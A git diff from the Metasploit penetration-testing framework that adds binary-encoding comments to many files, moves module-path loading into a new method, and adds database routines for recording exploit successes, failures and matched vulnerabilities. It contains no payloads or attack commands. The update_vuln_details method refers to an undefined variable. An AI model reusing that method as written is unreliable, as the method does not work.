diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb
index c2a06e6d6a..fb467f39f4 100644
--- a/lib/msf/base/sessions/meterpreter_options.rb
+++ b/lib/msf/base/sessions/meterpreter_options.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/sessions/meterpreter_php.rb b/lib/msf/base/sessions/meterpreter_php.rb
index 7890d2682d..90cd75b2e7 100644
--- a/lib/msf/base/sessions/meterpreter_php.rb
+++ b/lib/msf/base/sessions/meterpreter_php.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/sessions/meterpreter_x64_win.rb b/lib/msf/base/sessions/meterpreter_x64_win.rb
index 614ff31e59..84b56c9e69 100644
--- a/lib/msf/base/sessions/meterpreter_x64_win.rb
+++ b/lib/msf/base/sessions/meterpreter_x64_win.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: meterpreter_options.rb 10595 2010-10-08 04:11:47Z hdm $
##
diff --git a/lib/msf/base/sessions/meterpreter_x86_bsd.rb b/lib/msf/base/sessions/meterpreter_x86_bsd.rb
index d19c595009..fcb55d3788 100644
--- a/lib/msf/base/sessions/meterpreter_x86_bsd.rb
+++ b/lib/msf/base/sessions/meterpreter_x86_bsd.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/sessions/meterpreter_x86_linux.rb b/lib/msf/base/sessions/meterpreter_x86_linux.rb
index 8b3c3cb5fb..df6029cf60 100644
--- a/lib/msf/base/sessions/meterpreter_x86_linux.rb
+++ b/lib/msf/base/sessions/meterpreter_x86_linux.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/sessions/meterpreter_x86_win.rb b/lib/msf/base/sessions/meterpreter_x86_win.rb
index be696ad170..12a259a892 100644
--- a/lib/msf/base/sessions/meterpreter_x86_win.rb
+++ b/lib/msf/base/sessions/meterpreter_x86_win.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/sessions/scriptable.rb b/lib/msf/base/sessions/scriptable.rb
index fabfe55fdc..971db7f78e 100644
--- a/lib/msf/base/sessions/scriptable.rb
+++ b/lib/msf/base/sessions/scriptable.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf::Session
diff --git a/lib/msf/base/sessions/tty.rb b/lib/msf/base/sessions/tty.rb
index d7e9af8d66..cf8dddf2d6 100644
--- a/lib/msf/base/sessions/tty.rb
+++ b/lib/msf/base/sessions/tty.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/sessions/vncinject.rb b/lib/msf/base/sessions/vncinject.rb
index 24fb66dbdd..6f1eb18dcf 100644
--- a/lib/msf/base/sessions/vncinject.rb
+++ b/lib/msf/base/sessions/vncinject.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/base'
require 'rex/services/local_relay'
diff --git a/lib/msf/base/sessions/vncinject_options.rb b/lib/msf/base/sessions/vncinject_options.rb
index d7e5d67c46..1ae2954ceb 100644
--- a/lib/msf/base/sessions/vncinject_options.rb
+++ b/lib/msf/base/sessions/vncinject_options.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/simple.rb b/lib/msf/base/simple.rb
index 2a1e8cdc81..e9985164bf 100644
--- a/lib/msf/base/simple.rb
+++ b/lib/msf/base/simple.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Buffer management
require 'msf/base/simple/buffer'
require 'msf/base/simple/statistics'
diff --git a/lib/msf/base/simple/auxiliary.rb b/lib/msf/base/simple/auxiliary.rb
index 9815358120..1eada62e93 100644
--- a/lib/msf/base/simple/auxiliary.rb
+++ b/lib/msf/base/simple/auxiliary.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Simple
diff --git a/lib/msf/base/simple/buffer.rb b/lib/msf/base/simple/buffer.rb
index e1d887ca86..3f4992c071 100644
--- a/lib/msf/base/simple/buffer.rb
+++ b/lib/msf/base/simple/buffer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/simple/encoder.rb b/lib/msf/base/simple/encoder.rb
index 4ec756cc69..961ca69a0c 100644
--- a/lib/msf/base/simple/encoder.rb
+++ b/lib/msf/base/simple/encoder.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Simple
diff --git a/lib/msf/base/simple/exploit.rb b/lib/msf/base/simple/exploit.rb
index 018029cbea..adf2f781e7 100644
--- a/lib/msf/base/simple/exploit.rb
+++ b/lib/msf/base/simple/exploit.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/base'
module Msf
diff --git a/lib/msf/base/simple/framework.rb b/lib/msf/base/simple/framework.rb
index b9d3fde778..216b97e1fe 100644
--- a/lib/msf/base/simple/framework.rb
+++ b/lib/msf/base/simple/framework.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/base/simple'
module Msf
@@ -102,33 +103,14 @@ module Framework
# Load the configuration
framework.load_config
- # Set the file that will be used to cache information about modules for
- # the purpose of providing demand-loaded modules.
- framework.modules.set_module_cache_file(
- File.join(Msf::Config.config_directory, 'modcache'))
-
- # Initialize the default module search paths
- if (Msf::Config.module_directory)
- framework.modules.add_module_path(Msf::Config.module_directory)
- end
-
- # Initialize the user module search path
- if (Msf::Config.user_module_directory)
- framework.modules.add_module_path(Msf::Config.user_module_directory)
- end
-
- # If additional module paths have been defined globally, then load them.
- # They should be separated by semi-colons.
- if framework.datastore['MsfModulePaths']
- framework.datastore['MsfModulePaths'].split(";").each { |path|
- framework.modules.add_module_path(path)
- }
- end
-
# Register the framework as its own general event subscriber in this
# instance
framework.events.add_general_subscriber(framework)
+ unless opts['DeferModuleLoads']
+ framework.init_module_paths
+ end
+
return framework
end
@@ -145,6 +127,7 @@ module Framework
end
end
+
##
#
# Simplified interface
@@ -172,11 +155,51 @@ module Framework
self.datastore.to_file(Msf::Config.config_file, 'framework/core')
end
+ #
+ # Initialize the module paths
+ #
+ def init_module_paths
+
+ # Ensure the module cache is accurate
+ self.modules.refresh_cache
+
+ # Initialize the default module search paths
+ if (Msf::Config.module_directory)
+ self.modules.add_module_path(Msf::Config.module_directory)
+ end
+
+ # Initialize the user module search path
+ if (Msf::Config.user_module_directory)
+ self.modules.add_module_path(Msf::Config.user_module_directory)
+ end
+
+ # If additional module paths have been defined globally, then load them.
+ # They should be separated by semi-colons.
+ if self.datastore['MsfModulePaths']
+ self.datastore['MsfModulePaths'].split(";").each { |path|
+ self.modules.add_module_path(path)
+ }
+ end
+ end
+
#
# Statistics.
#
attr_reader :stats
+ #
+ # Boolean indicating whether the cache is initialized yet
+ #
+ attr_reader :cache_initialized
+
+ #
+ # Thread of the running rebuild operation
+ #
+ attr_reader :cache_thread
+ attr_writer :cache_initialized # :nodoc:
+ attr_writer :cache_thread # :nodoc:
+
+
protected
attr_writer :stats # :nodoc:
diff --git a/lib/msf/base/simple/module.rb b/lib/msf/base/simple/module.rb
index 396d9d99c5..7913a8bd11 100644
--- a/lib/msf/base/simple/module.rb
+++ b/lib/msf/base/simple/module.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/base'
module Msf
diff --git a/lib/msf/base/simple/nop.rb b/lib/msf/base/simple/nop.rb
index 4e1d3974f8..c73401c1b4 100644
--- a/lib/msf/base/simple/nop.rb
+++ b/lib/msf/base/simple/nop.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/base'
module Msf
diff --git a/lib/msf/base/simple/payload.rb b/lib/msf/base/simple/payload.rb
index 00d75e4bd5..7f6cae11dd 100644
--- a/lib/msf/base/simple/payload.rb
+++ b/lib/msf/base/simple/payload.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/simple/post.rb b/lib/msf/base/simple/post.rb
index 678c95bf5f..65004ed04f 100644
--- a/lib/msf/base/simple/post.rb
+++ b/lib/msf/base/simple/post.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Simple
diff --git a/lib/msf/base/simple/statistics.rb b/lib/msf/base/simple/statistics.rb
index 9d2d2974d6..579e9a3613 100644
--- a/lib/msf/base/simple/statistics.rb
+++ b/lib/msf/base/simple/statistics.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Simple
diff --git a/lib/msf/core.rb b/lib/msf/core.rb
index 2117e6ab11..64cc36454c 100644
--- a/lib/msf/core.rb
+++ b/lib/msf/core.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# framework-core
diff --git a/lib/msf/core.rb.ts.rb b/lib/msf/core.rb.ts.rb
index b1e7c0344e..bd50d7cea6 100644
--- a/lib/msf/core.rb.ts.rb
+++ b/lib/msf/core.rb.ts.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'test/unit'
require 'msf/core'
diff --git a/lib/msf/core/auxiliary.rb b/lib/msf/core/auxiliary.rb
index 1eb979c429..571efef878 100644
--- a/lib/msf/core/auxiliary.rb
+++ b/lib/msf/core/auxiliary.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/module'
module Msf
diff --git a/lib/msf/core/auxiliary/auth_brute.rb b/lib/msf/core/auxiliary/auth_brute.rb
index d4cc364ecc..b82b6d8e3c 100644
--- a/lib/msf/core/auxiliary/auth_brute.rb
+++ b/lib/msf/core/auxiliary/auth_brute.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/auxiliary/cisco.rb b/lib/msf/core/auxiliary/cisco.rb
index 073290ec24..92aa947a1f 100644
--- a/lib/msf/core/auxiliary/cisco.rb
+++ b/lib/msf/core/auxiliary/cisco.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/auxiliary/commandshell.rb b/lib/msf/core/auxiliary/commandshell.rb
index e46af76a88..d4c91a454d 100644
--- a/lib/msf/core/auxiliary/commandshell.rb
+++ b/lib/msf/core/auxiliary/commandshell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/auxiliary/crawler.rb b/lib/msf/core/auxiliary/crawler.rb
index b3ccd8e513..c530ee266f 100644
--- a/lib/msf/core/auxiliary/crawler.rb
+++ b/lib/msf/core/auxiliary/crawler.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/auxiliary/dos.rb b/lib/msf/core/auxiliary/dos.rb
index 267547b1f2..c0e8dfbb46 100644
--- a/lib/msf/core/auxiliary/dos.rb
+++ b/lib/msf/core/auxiliary/dos.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/auxiliary/fuzzer.rb b/lib/msf/core/auxiliary/fuzzer.rb
index 6ee83f8c6a..2e569dc8c7 100644
--- a/lib/msf/core/auxiliary/fuzzer.rb
+++ b/lib/msf/core/auxiliary/fuzzer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/auxiliary/iax2.rb b/lib/msf/core/auxiliary/iax2.rb
index 538cacd098..181e5948bf 100644
--- a/lib/msf/core/auxiliary/iax2.rb
+++ b/lib/msf/core/auxiliary/iax2.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/iax2/client'
module Msf
diff --git a/lib/msf/core/auxiliary/jtr.rb b/lib/msf/core/auxiliary/jtr.rb
index 8fa4c3d611..8dbba2cc05 100644
--- a/lib/msf/core/auxiliary/jtr.rb
+++ b/lib/msf/core/auxiliary/jtr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'open3'
require 'fileutils'
require 'rex/proto/ntlm/crypt'
diff --git a/lib/msf/core/auxiliary/login.rb b/lib/msf/core/auxiliary/login.rb
index 6142998f01..816604a95b 100644
--- a/lib/msf/core/auxiliary/login.rb
+++ b/lib/msf/core/auxiliary/login.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/auxiliary/mime_types.rb b/lib/msf/core/auxiliary/mime_types.rb
index eff5a6b87f..ca19afd693 100644
--- a/lib/msf/core/auxiliary/mime_types.rb
+++ b/lib/msf/core/auxiliary/mime_types.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'action_dispatch/http/mime_type'
module Msf
diff --git a/lib/msf/core/auxiliary/mixins.rb b/lib/msf/core/auxiliary/mixins.rb
index f866facb0e..0274845b69 100644
--- a/lib/msf/core/auxiliary/mixins.rb
+++ b/lib/msf/core/auxiliary/mixins.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/auxiliary/nmap.rb b/lib/msf/core/auxiliary/nmap.rb
index 6051d8d1b5..2f40def8b5 100644
--- a/lib/msf/core/auxiliary/nmap.rb
+++ b/lib/msf/core/auxiliary/nmap.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/parser/nmap_nokogiri'
require 'rex/parser/nmap_xml'
require 'open3'
diff --git a/lib/msf/core/auxiliary/pii.rb b/lib/msf/core/auxiliary/pii.rb
index 8be7644ff7..3630f08835 100644
--- a/lib/msf/core/auxiliary/pii.rb
+++ b/lib/msf/core/auxiliary/pii.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
# $Id$
###
diff --git a/lib/msf/core/auxiliary/report.rb b/lib/msf/core/auxiliary/report.rb
index bb7f961213..057d03e537 100644
--- a/lib/msf/core/auxiliary/report.rb
+++ b/lib/msf/core/auxiliary/report.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/auxiliary/rservices.rb b/lib/msf/core/auxiliary/rservices.rb
index a065c9f0ef..25671464df 100644
--- a/lib/msf/core/auxiliary/rservices.rb
+++ b/lib/msf/core/auxiliary/rservices.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/auxiliary/scanner.rb b/lib/msf/core/auxiliary/scanner.rb
index b57377f450..c03fb093a3 100644
--- a/lib/msf/core/auxiliary/scanner.rb
+++ b/lib/msf/core/auxiliary/scanner.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/auxiliary/timed.rb b/lib/msf/core/auxiliary/timed.rb
index 6555fb9a3d..936c48c280 100644
--- a/lib/msf/core/auxiliary/timed.rb
+++ b/lib/msf/core/auxiliary/timed.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/auxiliary/wmapmodule.rb b/lib/msf/core/auxiliary/wmapmodule.rb
index 313a7ed31a..fe55d7747e 100644
--- a/lib/msf/core/auxiliary/wmapmodule.rb
+++ b/lib/msf/core/auxiliary/wmapmodule.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
#
diff --git a/lib/msf/core/constants.rb b/lib/msf/core/constants.rb
index cd4961529f..679d644aea 100644
--- a/lib/msf/core/constants.rb
+++ b/lib/msf/core/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# This file contains constants that are referenced by the core
diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb
index a6db37afcc..38b48c644e 100644
--- a/lib/msf/core/data_store.rb
+++ b/lib/msf/core/data_store.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb
index 2f882703c9..081d6474d1 100644
--- a/lib/msf/core/db.rb
+++ b/lib/msf/core/db.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Check Rex::Parser.nokogiri_loaded for status of the Nokogiri parsers
require 'rex/parser/nmap_nokogiri'
require 'rex/parser/nexpose_simple_nokogiri'
@@ -687,17 +688,38 @@ class DBManager
# it's vulnerable to, so it isn't really useful to save it.
if opts[:session] and session.via_exploit and session.via_exploit != "exploit/multi/handler"
return unless host
- port = session.exploit_datastore["RPORT"]
- service = (port ? host.services.find_by_port(port) : nil)
+
mod = framework.modules.create(session.via_exploit)
vuln_info = {
:host => host.address,
- :name => session.via_exploit,
+ :name => mod.name,
:refs => mod.references,
:workspace => wspace,
- :exploited_at => Time.now.utc
+ :exploited_at => Time.now.utc,
+ :info => "Exploited by #{mod.fullname} to create Session #{s.id}"
}
- framework.db.report_vuln(vuln_info)
+
+ port = session.exploit_datastore["RPORT"]
+ service = (port ? host.services.find_by_port(port.to_i) : nil)
+
+ vuln_info[:service] = service if service
+
+ vuln = framework.db.report_vuln(vuln_info)
+
+ attempt_info = {
+ :timestamp => Time.now.utc,
+ :workspace => wspace,
+ :module => session.via_exploit,
+ :username => session.username,
+ :refs => mod.references,
+ :session_id => s.id,
+ :host => host,
+ :service => service,
+ :vuln => vuln
+ }
+
+ framework.db.report_exploit_success(attempt_info)
+
end
s
@@ -788,6 +810,225 @@ class DBManager
}
end
+
+ def report_exploit_success(opts)
+ ::ActiveRecord::Base.connection_pool.with_connection {
+
+ wspace = opts.delete(:workspace) || workspace
+ mrefs = opts.delete(:refs) || return
+ host = opts.delete(:host)
+ port = opts.delete(:port)
+ prot = opts.delete(:proto)
+ svc = opts.delete(:service)
+ vuln = opts.delete(:vuln)
+
+ timestamp = opts.delete(:timestamp)
+ username = opts.delete(:username)
+ mname = opts.delete(:module)
+
+ # Look up or generate the host as appropriate
+ if not (host and host.kind_of? ::Mdm::Host)
+ if svc.kind_of? ::Mdm::Service
+ host = svc.host
+ else
+ host = report_host(:workspace => wspace, :address => host )
+ end
+ end
+
+ # Bail if we dont have a host object
+ return if not host
+
+ # Look up or generate the service as appropriate
+ if port and svc.nil?
+ svc = report_service(:workspace => wspace, :host => host, :port => port, :proto => prot ) if port
+ end
+
+ if not vuln
+ # Create a references map from the module list
+ ref_objs = ::Mdm::Ref.where(:name => mrefs.map { |ref|
+ if ref.respond_to?(:ctx_id) and ref.respond_to?(:ctx_val)
+ "#{ref.ctx_id}-#{ref.ctx_val}"
+ else
+ ref.to_s
+ end
+ })
+
+ # Try find a matching vulnerability
+ vuln = find_vuln_by_refs(ref_objs, host, svc)
+ end
+
+ # We have match, lets create a vuln_attempt record
+ if vuln
+ attempt_info = {
+ :vuln_id => vuln.id,
+ :attempted_at => timestamp || Time.now.utc,
+ :exploited => true,
+ :username => username || "unknown",
+ :module => mname
+ }
+
+ attempt_info[:session_id] = opts[:session_id] if opts[:session_id]
+ attempt_info[:loot_id] = opts[:loot_id] if opts[:loot_id]
+
+ vuln.vuln_attempts.create(attempt_info)
+
+ # Correct the vuln's associated service if necessary
+ if svc and vuln.service_id.nil?
+ vuln.service = svc
+ vuln.save
+ end
+ end
+
+ # Report an exploit attempt all the same
+ attempt_info = {
+ :attempted_at => timestamp || Time.now.utc,
+ :exploited => true,
+ :username => username || "unknown",
+ :module => mname
+ }
+
+ attempt_info[:vuln_id] = vuln.id if vuln
+ attempt_info[:session_id] = opts[:session_id] if opts[:session_id]
+ attempt_info[:loot_id] = opts[:loot_id] if opts[:loot_id]
+
+ if svc
+ attempt_info[:port] = svc.port
+ attempt_info[:proto] = svc.proto
+ end
+
+ if port and svc.nil?
+ attempt_info[:port] = port
+ attempt_info[:proto] = prot || "tcp"
+ end
+
+ host.exploit_attempts.create(attempt_info)
+ }
+ end
+
+ def report_exploit_failure(opts)
+
+ ::ActiveRecord::Base.connection_pool.with_connection {
+ wspace = opts.delete(:workspace) || workspace
+ mrefs = opts.delete(:refs) || return
+ host = opts.delete(:host)
+ port = opts.delete(:port)
+ prot = opts.delete(:proto)
+ svc = opts.delete(:service)
+ vuln = opts.delete(:vuln)
+
+ timestamp = opts.delete(:timestamp)
+ freason = opts.delete(:fail_reason)
+ fdetail = opts.delete(:fail_detail)
+ username = opts.delete(:username)
+ mname = opts.delete(:module)
+
+ # Look up the host as appropriate
+ if not (host and host.kind_of? ::Mdm::Host)
+ if svc.kind_of? ::Mdm::Service
+ host = svc.host
+ else
+ host = get_host( :workspace => wspace, :address => host )
+ end
+ end
+
+ # Bail if we dont have a host object
+ return if not host
+
+ # Look up the service as appropriate
+ if port and svc.nil?
+ prot ||= "tcp"
+ svc = get_service(wspace, host, prot, port) if port
+ end
+
+ if not vuln
+ # Create a references map from the module list
+ ref_objs = ::Mdm::Ref.where(:name => mrefs.map { |ref|
+ if ref.respond_to?(:ctx_id) and ref.respond_to?(:ctx_val)
+ "#{ref.ctx_id}-#{ref.ctx_val}"
+ else
+ ref.to_s
+ end
+ })
+
+ # Try find a matching vulnerability
+ vuln = find_vuln_by_refs(ref_objs, host, svc)
+ end
+
+ # Report a vuln_attempt if we found a match
+ if vuln
+ attempt_info = {
+ :attempted_at => timestamp || Time.now.utc,
+ :exploited => false,
+ :fail_reason => freason,
+ :fail_detail => fdetail,
+ :username => username || "unknown",
+ :module => mname
+ }
+
+ vuln.vuln_attempts.create(attempt_info)
+ end
+
+ # Report an exploit attempt all the same
+ attempt_info = {
+ :attempted_at => timestamp || Time.now.utc,
+ :exploited => false,
+ :username => username || "unknown",
+ :module => mname,
+ :fail_reason => freason,
+ :fail_detail => fdetail
+ }
+
+ attempt_info[:vuln_id] = vuln.id if vuln
+
+ if svc
+ attempt_info[:port] = svc.port
+ attempt_info[:proto] = svc.proto
+ end
+
+ if port and svc.nil?
+ attempt_info[:port] = port
+ attempt_info[:proto] = prot || "tcp"
+ end
+
+ host.exploit_attempts.create(attempt_info)
+ }
+ end
+
+
+ def report_vuln_attempt(vuln, opts)
+ ::ActiveRecord::Base.connection_pool.with_connection {
+ return if not vuln
+ info = {}
+
+ # Opts can be keyed by strings or symbols
+ ::Mdm::VulnAttempt.column_names.each do |kn|
+ k = kn.to_sym
+ next if ['id', 'vuln_id'].include?(kn)
+ info[k] = opts[kn] if opts[kn]
+ info[k] = opts[k] if opts[k]
+ end
+
+ vuln.vuln_attempts.create(info)
+ }
+ end
+
+ def report_exploit_attempt(host, opts)
+ ::ActiveRecord::Base.connection_pool.with_connection {
+ return if not host
+ info = {}
+
+ # Opts can be keyed by strings or symbols
+ ::Mdm::VulnAttempt.column_names.each do |kn|
+ k = kn.to_sym
+ next if ['id', 'host_id'].include?(kn)
+ info[k] = opts[kn] if opts[kn]
+ info[k] = opts[k] if opts[k]
+ end
+
+ host.exploit_attempts.create(info)
+ }
+ end
+
def get_client(opts)
::ActiveRecord::Base.connection_pool.with_connection {
wspace = opts.delete(:workspace) || workspace
@@ -1281,11 +1522,12 @@ class DBManager
#
# opts MUST contain
# +:host+:: the host where this vulnerability resides
- # +:name+:: the scanner-specific id of the vuln (e.g. NEXPOSE-cifs-acct-password-never-expires)
+ # +:name+:: the friendly name for this vulnerability (title)
#
# opts can contain
- # +:info+:: a human readable description of the vuln, free-form text
- # +:refs+:: an array of Ref objects or string names of references
+ # +:info+:: a human readable description of the vuln, free-form text
+ # +:refs+:: an array of Ref objects or string names of references
+ # +:details:: a hash with :key pointed to a find criteria hash and the rest containing VulnDetail fields
#
def report_vuln(opts)
return if not active
@@ -1298,10 +1540,11 @@ class DBManager
wspace = opts.delete(:workspace) || workspace
exploited_at = opts[:exploited_at] || opts["exploited_at"]
- rids = nil
+ details = opts.delete(:details)
+ rids = opts.delete(:ref_ids)
if opts[:refs]
- rids = []
+ rids ||= []
opts[:refs].each do |r|
if (r.respond_to?(:ctx_id)) and (r.respond_to?(:ctx_val))
r = "#{r.ctx_id}-#{r.ctx_val}"
@@ -1321,16 +1564,6 @@ class DBManager
ret = {}
-=begin
- if host
- host.updated_at = host.created_at
- host.state = HostState::Alive
- host.save!
- else
- host = get_host(:workspace => wspace, :address => addr)
- end
-=end
-
# Truncate the info field at the maximum field length
if info
info = info[0,65535]
@@ -1339,41 +1572,152 @@ class DBManager
# Truncate the name field at the maximum field length
name = name[0,255]
- if info and name !~ /^NEXPOSE-/
- vuln = host.vulns.find_or_initialize_by_name_and_info(name, info)
+ # Placeholder for the vuln object
+ vuln = nil
+
+ # Identify the associated service
+ service = opts.delete(:service)
+
+ # Treat port zero as no service
+ if service or opts[:port].to_i > 0
+
+ if not service
+ proto = nil
+ case opts[:proto].to_s.downcase # Catch incorrect usages, as in report_note
+ when 'tcp','udp'
+ proto = opts[:proto]
+ when 'dns','snmp','dhcp'
+ proto = 'udp'
+ sname = opts[:proto]
+ else
+ proto = 'tcp'
+ sname = opts[:proto]
+ end
+
+ service = host.services.find_or_create_by_port_and_proto(opts[:port].to_i, proto)
+ end
+
+ # Try to find an existing vulnerability with the same service & references
+ # If there are multiple matches, choose the one with the most matches
+ # If a match is found on a vulnerability with no associated service,
+ # update that vulnerability with our service information. This helps
+ # prevent dupes of the same vuln found by both local patch and
+ # service detection.
+ if rids and rids.length > 0
+ vuln = find_vuln_by_refs(rids, host, service)
+ vuln.service = service if vuln
+ end
else
- vuln = host.vulns.find_or_initialize_by_name(name)
+ # Try to find an existing vulnerability with the same host & references
+ # If there are multiple matches, choose the one with the most matches
+ if rids and rids.length > 0
+ vuln = find_vuln_by_refs(rids, host)
+ end
end
- vuln.info = info.to_s if info
+ # Try to match based on vuln_details records
+ if not vuln and opts[:details_match]
+ vuln = find_vuln_by_details(opts[:details_match], host, service)
+ if vuln and service and not vuln.service
+ vuln.service = service
+ end
+ end
+
+ # No matches, so create a new vuln record
+ unless vuln
+ if service
+ vuln = service.vulns.find_by_name(name)
+ else
+ vuln = host.vulns.find_by_name(name)
+ end
+
+ unless vuln
+
+ vinf = {
+ :host_id => host.id,
+ :name => name,
+ :info => info
+ }
+
+ vinf[:service_id] = service.id if service
+ vuln = Mdm::Vuln.create(vinf)
+ end
+ end
+
+ # Set the exploited_at value if provided
vuln.exploited_at = exploited_at if exploited_at
- if opts[:port]
- proto = nil
- case opts[:proto].to_s.downcase # Catch incorrect usages, as in report_note
- when 'tcp','udp'
- proto = opts[:proto]
- when 'dns','snmp','dhcp'
- proto = 'udp'
- sname = opts[:proto]
- else
- proto = 'tcp'
- sname = opts[:proto]
- end
- vuln.service = host.services.find_or_create_by_port_and_proto(opts[:port], proto)
- end
-
+ # Merge the references
if rids
vuln.refs << (rids - vuln.refs)
end
+ # Finalize
if vuln.changed?
msf_import_timestamps(opts,vuln)
vuln.save!
end
+
+ # Handle vuln_details parameters
+ report_vuln_details(vuln, details) if details
+
+ vuln
}
end
+ def find_vuln_by_refs(refs, host, service=nil)
+
+ vuln = nil
+
+ # Try to find an existing vulnerability with the same service & references
+ # If there are multiple matches, choose the one with the most matches
+ if service
+ refs_ids = refs.map{|x| x.id }
+ vuln = service.vulns.find(:all, :include => [:refs], :conditions => { 'refs.id' => refs_ids }).sort { |a,b|
+ ( refs_ids - a.refs.map{|x| x.id } ).length <=> ( refs_ids - b.refs.map{|x| x.id } ).length
+ }.first
+ end
+
+ # Return if we matched based on service
+ return vuln if vuln
+
+ # Try to find an existing vulnerability with the same host & references
+ # If there are multiple matches, choose the one with the most matches
+ refs_ids = refs.map{|x| x.id }
+ vuln = host.vulns.find(:all, :include => [:refs], :conditions => { 'service_id' => nil, 'refs.id' => refs_ids }).sort { |a,b|
+ ( refs_ids - a.refs.map{|x| x.id } ).length <=> ( refs_ids - b.refs.map{|x| x.id } ).length
+ }.first
+
+ return vuln
+ end
+
+
+ def find_vuln_by_details(details_map, host, service=nil)
+
+ # Create a modified version of the criteria in order to match against
+ # the joined version of the fields
+
+ crit = {}
+ details_map.each_pair do |k,v|
+ crit[ "vuln_details.#{k}" ] = v
+ end
+
+ vuln = nil
+
+ if service
+ vuln = service.vulns.find(:first, :include => [:vuln_details], :conditions => crit)
+ end
+
+ # Return if we matched based on service
+ return vuln if vuln
+
+ # Prevent matches against other services
+ crit["vulns.service_id"] = nil if service
+ vuln = host.vulns.find(:first, :include => [:vuln_details], :conditions => crit)
+
+ return vuln
+ end
+
def get_vuln(wspace, host, service, name, data='')
raise RuntimeError, "Not workspace safe: #{caller.inspect}"
::ActiveRecord::Base.connection_pool.with_connection {
@@ -1411,6 +1755,54 @@ class DBManager
}
end
+ #
+ # Populate the vuln_details table with additional
+ # information, matched by a specific criteria
+ #
+ def report_vuln_details(vuln, details)
+ ::ActiveRecord::Base.connection_pool.with_connection {
+ detail = ::Mdm::VulnDetail.where(( details.delete(:key) || {} ).merge(:vuln_id => vuln.id)).first
+ if detail
+ details.each_pair do |k,v|
+ detail[k] = v
+ end
+ detail.save! if detail.changed?
+ detail
+ else
+ detail = ::Mdm::VulnDetail.create(details.merge(:vuln_id => vuln.id))
+ end
+ }
+ end
+
+ #
+ # Update vuln_details records en-masse based on specific criteria
+ # Note that this *can* update data across workspaces
+ #
+ def update_vuln_details(details)
+ criteria = details.delete(:key) || {}
+ ::Mdm::VulnDetail.update(key, details)
+ end
+
+ #
+ # Populate the host_details table with additional
+ # information, matched by a specific criteria
+ #
+ def report_host_details(host, details)
+ ::ActiveRecord::Base.connection_pool.with_connection {
+
+ detail = ::Mdm::HostDetail.where(( details.delete(:key) || {} ).merge(:host_id => host.id)).first
+ if detail
+ details.each_pair do |k,v|
+ detail[k] = v
+ end
+ detail.save! if detail.changed?
+ detail
+ else
+ detail = ::Mdm::HostDetail.create(details.merge(:host_id => host.id))
+ end
+ }
+ end
+
